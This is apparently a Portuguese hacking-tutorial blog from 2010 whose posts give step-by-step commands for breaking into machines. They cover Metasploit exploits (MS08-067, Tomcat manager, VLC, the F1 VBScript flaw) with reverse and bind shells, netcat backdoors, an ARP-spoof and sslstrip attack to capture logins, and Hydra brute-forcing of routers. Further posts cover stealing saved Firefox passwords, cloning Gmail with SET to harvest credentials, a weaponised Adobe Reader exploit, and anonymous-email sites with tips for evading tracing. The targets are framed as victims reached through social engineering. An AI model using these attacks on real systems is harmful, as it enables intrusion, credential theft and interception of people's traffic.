banner468

domingo, 30 de maio de 2010

Invasão em micro Linux

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo clique aqui!

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:


Citação:

nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit
Programas usados:
Metasploit
Nmap

Ambiente da aula e em uma distro Linux, lembrando que pode ser em qualquer sistema operacional que rode o metasploit.

Obs: O pessoal ja engessou que sistema operacional linux e seguro que Windows e vulnerável. O Linux da uma camada a mais de segurança, mas possui vulnerabilidades também. Sempre atualize.

Baixar:

Assisti on-line:

Citação:

http://bhior.blip.tv/file/3689430

Metagoofil

Metagoofil e uma ferramenta escrita em python que extrair arquivos (pdf, doc, xls, ppt) disponível no site alvo. Esse arquivos podem ser usando para varios tipos de ataque como por exemplo de ataque de forças-bruta, um simples exemplo e para ataque de força-bruta (vpn, ftp, webapps etc.), existem técnicas que nos permitem extrair mac dos arquivos e etc... .
Com ele da para extrair vários tipos de arquivos (pdf, doc, xls, ppt, etc.), o resultado e gerado um html descritos os arquivos baixados e uma pasta contendo os mesmo.

Comandos:

Citação:
#python metagoofil.py -d google.com -l 20 -f doc -o Bhior.html -t arquivos

-d > Domínio para a pesquisa dos arquivos
-l > Limite dos resultados (No máximo ate 100)
-f >Tipo de arquivo para baixar
-o > entrada de arquivo no formato html
-t > diretório para serem armazenados os arquivos baixados
Baixar:

Assisti on-line:

Metagoogil:

sexta-feira, 28 de maio de 2010

Remote Desktop com VNC via metasploit

Mostro com acessar um desktop remotamente com VNC via metasploit uma de muitas ferramentas encontradas no metasploit.

O que eu fiz?
Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapi

Comandos:
use exploit/windows/smb/ms08_067_netapi
set RHOST IP_da_vitima
set PAYLOAD windows/vncinject/bind_tc
exploit
O ambiente da aula e numa distro linux "backtrack 4", mas pode ser usando em qualquer SO que rode metasploit.


Baixar: http://www.4shared.com/file/olS5vapb/Remote_desktop_VNC.html

Assisti on line: http://blip.tv/file/3686233

terça-feira, 25 de maio de 2010

Vulnerabilidade no Adober Reader - CVE-2010-0188

Um hacker chamado villy fez um script python que vai criar um pdf que lançará calc.exe WinXP SP2 apos execução do "pdf" na versão mais atualizada do Adobe Reader que e a 9.3 mas funcionar nas versões 9.1 9.2 e 9.3 do Adobe Reader instalado, mesmo com Java desligado.
Depois de brincar com ele que substituiu o shellcode com o Windows Shell Reverse e depois tentei em um sistema totalmente atualizado! E o que acontece? hehehe

Exploit trabalha com Adobe Javascript desativado.
Testado: testado com sucesso no Adobe Reader 9.1/9.2/9.3 OS Windows XP (SP2, SP3 todas as línguas), também trabalha com o plugin Adobe navegador

 

Baixar: http://www.4shared.com/file/oQ7wl-OE/CVE-2010-0188_Adobe_Working_Ex.html

Assisti on-line: http://bhior.blip.tv/file/3669774


Script em Python: http://www.4shared.com/file/AR9LPTmw/CVE-2010-0188.html


Fonte: http://bugix-security.blogspot.com/

domingo, 23 de maio de 2010

Desabilitando a atualização do Windows

Mini tuto de como cancelar a atualização automática do Windows XP.

Primeiro passo: Clique em "iniciar" > Executar... > "CMD"

Segundo passo: Vamos parar o serviço de atualização, no prompt de comando digita a seguinte sintaxe:

Citação:
net stop wuauserv



Terceiro passo
: Após ter parado o serviço automático das atualizações de Windows vamos entrar no diretório do Windows usando a sintaxe abaixo:

Citação:
cd /d %windir%



Quarto passo: Agora vamos remover no a atualização automática do Windows que fica escondida nesse diretório.

Citação:
rd /s SoftwareDistribution



Mas se por alguma ventura você se arrependeu do feito... e que iniciar o serviço novamente, e só digitar a seguinte sintaxe:

Citação:
net start wuauserv


Ate a próxima.

Sites para envio de e-mail anônimos

SendAnonymousEmail – Este é um serviço gratuito que permite o envio ilimitado de emails anônimos.

Deadfake – Em um ambiente muito familiar este site permite o envio de emails anônimos rico em detalhes(cores, fontes etc..).

Note2email – Uma aplicação web que permite o envio de notas rápidas para todo o mundo.

Fuzzmail – Sem cadastro nem nada, basta informar o email do destinatário, a menssagem e enviar.

W3 – Outro serviço muito bom, não necessita cadastro, ao clicar no link você diretamente irá para a tela de edição.

Anonymailer - O meu preferido com uma interface gráfica ampla e com caixa de diálogos do office word 2003, da para fazer maravilha...


Obs: Mesmo com esse site e bom usar proxy, a maioria deles guardam seus IP para possíveis provas caso vocês usem de má fé.

Espero que gostem.

Tool list - Lista de ferramentas para iniciantes

Imagem do Windows Vista para Pen-Test

Imagem do Vista para teste de segurança de maneira profissional e legal perante a lei.

Quais são os PCs Virtual (VPC), e qual é a diferença entre uma VPC e Virtual Hard Disk (VHD)?
Virtual PC (VPC) é um produto Microsoft que permite aos usuários executar uma instância virtual de um sistema operativo (aka Virtual Hard Disk) já está em execução dentro de uma instância de um sistema operacional (SO aka não-virtual). O Virtual Hard Disk (VHD) pode utilizar o hardware do computador (por exemplo, disco rígido, placa Ethernet, portas USB) da mesma forma que o SO não é virtual. A partir do OS não-virtual, o VHD aparece como um arquivo único e grande *. VHD.

Qual beneficio VHDs
VHDs são muito úteis tanto para laboratório e testes de implantação. Embora o software pode ser instalado em um VHD no software mesma forma é instalado em sistemas operacionais normais, VHDs podem ser descartadas e re-implementado muito rapidamente para o fim de assegurar um ambiente de teste pristine ou se algo funcionou mal com o VHD anterior. Além disso, VHDs múltiplos podem ser executados ao longo de uma única plataforma física para conseguir economias de custo.

Baixar:
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.zip
Final [zip, ~73MB]
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.z01
Final [zip, ~648MB]
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.z02
Final [zip, ~648MB]
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.z03
Final [zip, ~648MB]
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.z04
Final [zip, ~648MB]
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.z05
Final [zip, ~648MB]
wget http://nvd.nist.gov/download/FDCC-Q4-2009/FDCC_IMAGES/VISTA-Q4-2009/Vista_NIST_FDCC_Q4_2009.z06
Final [zip, ~648MB]
Imagem autorizadas para profissionais na área de segurança fazerem teste de laboratórios.

Abraços

terça-feira, 18 de maio de 2010

Video Demo - Vulnerabilidade da tecla F1

No dia 26 de fevereiro de 2010 foi notificado uma alerta de segurança aos usuários do sistema operacional Windows XP, para que pressionar a tecla F1, quando estivesse navegando pela internet com Internet Explorer, pois poderia ser vitima de um ataque possibilitando acesso total a maquina.

“A vulnerabilidade existe no jeito que o VBScript interage com arquivos de ajuda do Windows usando o Internet Explorer”, diz o boletim. “Se um site malicioso mostrar uma caixa de diálogo e o usuário apertar a tecla F1, códigos arbitrários podem ser executados."



O exploit usando esta nos repositório do metasploit, caso não encontre, faça uma atualização no console do metasploit com comando "svn update".

Vídeo aula Demo.


Baixar: http://www.4shared.com/file/r8dKHSbe/Demo_Vul_F1.html

Assistir on-line:  http://blip.tv/file/3641612

Obs: Esse tipo de ataque tem quer ser usando com uma boa ES.

segunda-feira, 17 de maio de 2010

Metasploit - Sniffer via meterpreter

Essa video e sobre sniffer via meterpreter em um micro invadido.

O que eu fiz?
Invadir um micro usando Windows XP SP2 com o metasploit e rodei o modulo sniffer.

Comando:


Citação:

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST IP_do_alvo
exploit
use sniffer
sniffer_interfaces
sniffer_start 1 200000
sniffer_stats 1
sniffer_dump 1 /local_destino_do_log.cap
sniffer_stop 1
Baixar: http://www.4shared.com/file/yI6r3wVP/Metasploit-meterprete_sniffer.html

Assisti on-line: http://bhior.blip.tv/file/3629529

Netcat - Backdoor e transferindo arquivos

Nessa aula mostro como usar o netcat com backdoor de sistema operacional Linux e Windows e como transferir arquivos com mesmo pela rede.

Comandos:

nc -l - Para fica em modo listen "escutar"
-p - Para especificar a porta
-e - Para conectar ao interpretador de comandos do sistema
> - Saída de arquivos
< - Entrada de arquivos
Programa:
Netcat
http://www.downloadnetcat.com/
Baixar:
Versão windows > Download Netcat Windows Version
Versão Linux (Source Tarball) > http://www.downloadnetcat.com/netcat-0.7.1.tar.gz
Versão LInux (RPM) > http://www.downloadnetcat.com/netcat-0.7.1-1.i386.rpm

Baixar aula: http://www.4shared.com/file/XH94X6iO/Netcat-Backdoor-transferindo_a.html


Assisti on-line: http://bhior.blip.tv/file/3630266

sábado, 15 de maio de 2010

Pent-test - Varredura com nmap, brute-force e consumando acesso e coletando informação

Ola pessoal nessa aula basicamente como quebrar senha de roteadores "router".

O que eu fiz?

# Obter endereço de IP
# Check gateway IP
# Verifique o caminho da página de configuração do roteador está utilizando
# Hydra - usando wordlists para quebrar o login e senha do roteador.
# Acessar o host remoto
# Capturar senha memorizado do mesmo.


Descrevendo...

Primeiro usei o nmap para fazer varredura em uma faixa de IP´s, com a seguinte sintaxe:

-sV - portas abertas para determinar o serviço/info versão
-T - Estabelece um padrão de temporização, no caso em questão usei o Aggressive. poderia simplesmente ter colocado -T4 assim não precisaria ter escrito agrressive, fiz de uma forma que torne mais fácil para o leitor absolver.
-A - Para permitir a detecção de SO e detecção de versão, Script varredura e Traceroute
-v - Aumentar o nível de verbosidade (obter informações)
-p - Para escanear as portas listadas por mim


Segundo passo foi escolher um host que tinha as duas portas que eu listei abertas. Entrei via http para verificar o método para quebrar a senha, que fica listada no final do IP, se tivesse só uma barra "/" quando fosse usar o bruteforce teria que ter só a barra ou qualquer outra coisa listada, com /index.aspx e etc...

Terceiro passo foi usar o Hydra para quebrar a senha do router com a seguinte sintaxe de comando:

-L - Local da wordlist que seria o login
-P - Local da wordlist que seria a senha
-t - Numero de senhas que serias testadas por vez
-e ns - Para verifica por senhas "vazias"
-f - Sair após o primeiro login encontrados
-V - Para combinar mais login/senha para cada tentativa
/hag/pages/home.htm - Pagina para a quebra.

Quarto passo foi obter acesso, nas duas portas listadas.

Quinto passo foi a coleta da senha memorizado no roteador.

Programas:

Hydra
v5.4
http://freeworld.thc.org/
Baixar: http://freeworld.thc.org/download.ph...5.4-src.tar.gz

Nmap

5.00
http://nmap.org
Baixar: http://nmap.org/download.html

Asterisk Key
9.7 Build 3495
http://www.lostpassword.com/
Baixar: http://www.lostpassword.com/f/downlo...y/ariskkey.exe

SnadBoy´s Revelation

2.0.1.100
http://www.snadboy.com/
http://www.snadboy.com/RevelationV2.zip

Sistemas operacionais usados Windows e Linux.

O que e precisa para ter sucesso nesse ataque de dicionario?
É uma boa wordlist. Caso queiram algumas e só me procurar.

Antes de começar o ataque e sempre bom tentar os usuários e senhas padrões de cada roteador, segue o link abaixo com uma lista deles:


Acessar: http://www.phenoelit-us.org/dpl/dpl.html

Baixar: http://www.4shared.com/file/X8tRkgwE/Cracking-hydra-nmap-tools.html

Assisti on-line: http://bhior.blip.tv/file/3628552


quinta-feira, 13 de maio de 2010

Sniffer SSL - https

Nesta video vou mostrar como a criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

Programas usados:

Programas usados:
SSLstrip
ARPspoof
Ettercap
Comando usados:
Citação:
kate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i eth0
OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0", o "0" vai depende de qual placa de rede você vai ultilizar.

Todas os programas são encontrados no backtrack 4


Baixar: http://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html

Assista on-line: http://bhior.blip.tv/file/3525086


Metasploit - Explorando falha MS08-067

Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:

Metasploit framework 3
Nmap

Exploit usado:
Citação:
ms08_067_netapi
Payload(carga) usado:
Citação:
shell_reverse_tcp
Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citação:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Baixar: http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm

Assistir on-line: http://bhior.blip.tv/file/3534979

Craqueando senhas .rar com cRARk

vídeo aula mostra como quebrar senha de arquivos .rar. Vídeo simples, mostro apenas o uso básico do cRARk.

Programa usado:

cRACk: http://www.crark.net/#download
Manual: http://www.crark.net/cRARk.html

Programa pode ser usando para os SO Windows, Linux e Mac.


Instalação no BackTrack 4:
Citação:
#apt-get install crark
Baixar: http://www.4shared.com/file/KScFAiKc/Quebrando_senha_rar.html

Assistir on-line: http://bhior.blip.tv/file/3529679

Metasploit GUI - Explorando falha MS08-067

Nessa video aula mostro uma técnica de penetração em um maquina usando windows XP sp2 via metasploit, para o pessoal do fórum que vem acompanhando vídeo anteriores minhas, perceberam que fiz tudo em modo texto, creio que a maioria dos usuários tem uma certa dificuldade ainda em lida com esse modo. Pensando nisso resolvi mostra em modo gráfico.

Na vídeo aula não mostrei como detectar o SO rodando no determinado host, isso pode ser feito com o nmap "nmap -O IP_alvo", para quem vem acompanhando minha vídeo ja poderão perceber isso.

Obs: Na hora de selecionar o Target (versão de sistema operacional), deixei automático, caso ele não encontre, e preciso add o sistema.

Uma coisa boa do modo gráfico e que ele nos fornece tudo organizado (Como vocês vão perceber no decore da vídeo aula), as vezes e uma mão na roda... hahaha


Baixar: http://www.4shared.com/file/M-B3UjNx/Metasploit_GUI_-_Explorando_fa.html

Assistir on-line: http://bhior.blip.tv/file/3546765

Configurando sistema operacional para não reponder a "ping" pacotes icmp

Na vídeo mostro em dois sistema operacionais, Windows e Linux.

Comando linux:
Citação:
Você pode usar um editor de texto ou no shell:
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
Comandos windows:
Citação:
Iniciar > Painel de controle > Central de segurança > Firewall do Windows > Avançado > Configurações > ICMP

Baixar: http://www.4shared.com/file/bSWtpcWF/desabilitar_icmp.html

Assistir on-line: http://bhior.blip.tv/file/3534889

Fast-track Autopowning WebGUI (metasploit&nmap)

Fast-track Autopowning e um ataque automatizado do mesmo com metasploit e nmap.

O que eu fiz?
Simplesmente add o host e selecionei o payload, o resto o programa faz tudo...


Programas usandos:

Fast-track (Metasploit&nmap)

*Todos agregados ao back-track 4

Baixar: http://www.4shared.com/file/NpyZwhCX/Fast-track-Autopowning-webGUI_.html

Assisti on-line: http://bhior.blip.tv/file/3607295

Hack Firefox - Metasploit - exploração via meterpreter

Nessa vídeo aula e de como pegar senha salvas no mozilla firefox em um micro invadido, no caso da vídeo, o micro rodava o Sistema operacional windows XP professional sp2. Depois de pega os arquivos do firefox, usei um programa para descriptografar e ter acesso as senhas memorizadas do navegador mozilla(Lembrado que e necessário todos os arquivo mostrados)...

O aplicativo e para Windows mais foi bem emulado pelo wine no linux. So não fiz a vídeo no Windows porque não tinha a maquina virtual instalada, iria demorar um pouco, então resolvi fazer no Linux mesmo...

Baixar: http://www.4shared.com/file/QmR0fbEn/Hack_firefox-meterpreter.html

Assisti on-line: http://bhior.blip.tv/file/3597402

Programa: http://www.4shared.com/file/cxzlaKd8/FirePasswordViewer.html

Cracking HTTP Passwords - Hydra

Nessa vídeo aula mostro o uso básico do hydra para quebrar senha http de um roteador. Fiz basicamente um ataque conhecido com "Ataque de dicionario" usando uma wordlist (Lista de palavras) para testa senhas em clientes remotos pode ser feito em 1 ou mais clientes.

Comandos:
Citação:
-l = usuário
-P = Senha (direcionei para uma wordlist)
-e ns = fazer checagem 'null' password
-t xx= Executa muitas tarefas de uma só vez.
-f = sair, uma vez que encontra o primeiro usuário/senha
-s = conectar via SSL
-vV = modo verbose (mostra mais informações)
192.168.1.1 = Endereço de IP
http-get = Método do crack
O que eu utilizei:
* Hydra
* Wordlist

Programa:
Hydra
Versão 5.4
Site: http://freeworld.thc.org/welcome/
Baixa: http://freeworld.thc.org/download.php?t=r&f=hydra-5.4-src.tar.gz

Baixar : http://www.4shared.com/file/ZIeZrwmG/Cracking_HTTP_Passwords_-_Hydr.html

Assisti On-line: http://bhior.blip.tv/file/3605416

Explorando vulnerabilidade no Player VLC - Metasploit

Nessa vídeo aula, mostro com explorar uma vulnerabilidade no VLC, esse ataque tem que ser usando com uma boa engenharia social. Criei um arquivos no metasploit chamado msf.ty onde podemos renomeá para qualquer arquivo suportado pelo VLC, no caso em questão usei .mp3. Com o arquivo enviado para vitima, quando a vitima executar no VLC entro dentro da maquina.

Comandos:
Citação:
use windows/fileformat/videolan_tivo
set payload windows/shell/reverse_tcp
set lhost Meu_IP
set rport 1975
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Baixar: http://www.4shared.com/file/63B5XNE4/Metasploit_vulnerabilidade_VLC.html

Assisti On-line: http://bhior.blip.tv/file/3600749

Nessa video aula, mostro com explorar uma vulnerabilidade no VLC, esse ataque tem que ser usando com uma boa engenharia social. Criei um arquivos no metasploit chamado msf.ty onde podemos renomeá para qualquer arquivo suportado pelo VLC, no caso em questão usei .mp3. Com o arquivo enviado para vitima, quando a vitima executar no VLC entro dentro da maquina.

Comandos:
Citação:
use windows/fileformat/videolan_tivo
set payload windows/shell/reverse_tcp
set lhost Meu_IP
set rport 1975
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Baixar:
Assistir on-line:
__________________

Hijacking com o SET - Social Engineering Toolkit

Nessa vídeo aula mostra a técnica de hijacking por meio do SET, existem outras formas de executa-las.
Como vocês vão poder observar na vídeo, clonei um site de minha preferencia com auxilio da SET, demonstrei uma forma de usar ES na vitima para que ele entre no link enviador pele atacante, a engenharia social vai contar muito nessa hora.
Como vão pode ver claramente ele clonar o site perfeitamente e apos o login no site alvo (Gmail), alem da captura da senha a vitima a mesma consegue logar normalmente no seu servidor web de e-mail (Gmail) sem deixar suspeitas.

Baixar:
Assista On-line:

quarta-feira, 12 de maio de 2010

Ataque automatizado com Metasploit & Nmap

Bom pessoal, nessa vídeo aula mostro como cria um base de dados para um ataque automatizado usando usando resultados do nmap.

A primeira coisa que eu fiz foi verificar quantos hosts estavam em minha disponível em minha rede com o comando:
nmap 10.1.1.1-100
Ele me mostra o resultado de de todas as maquinas que estão com ip 10.1.1.1, 10.1.1.2, 10.1.1.3 e assim sucessivamente ate o 10.1.1.100.

Nos mostrou 3 hosts:
1- Meu roteador D-link com 3 portas abertas
2- Minha maquina, com todas as portas fechadas
3- Maquina virtual usando windows XP (caso tenho duvida qual o sistema operacional rodando em um determinado IP "nmap -O IP")

Segundo passo, foi cria um banco de dados para armazenar os resultados do nmap.
db_create VITIMA (base de dados)
Terceira coisa foi verifica se tinha algum host disponível. Como vocês podem ver não tinha nenhum host predefinido.
db_hosts
Quarta coisa foi escanear o host. Acabei encontrando a porta 445 aberta (Que pode ser vulnerável)
nmap IP -p 445
Para finalizar eu executei o ataque automatizado. Então ele começou a procurar um exploit e foi injetando no host, para encontrar o exploit indicado para a vulnerabilidade da porta 445.
db_autopwn -t -p -e -s -b
No final ele me mostrou o exploit usado e ja injetado no host, já estava dentro do sistema com um meterpreter.

Programas usando:

metasploit & nmap

Download da video:
Assista On-line:

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers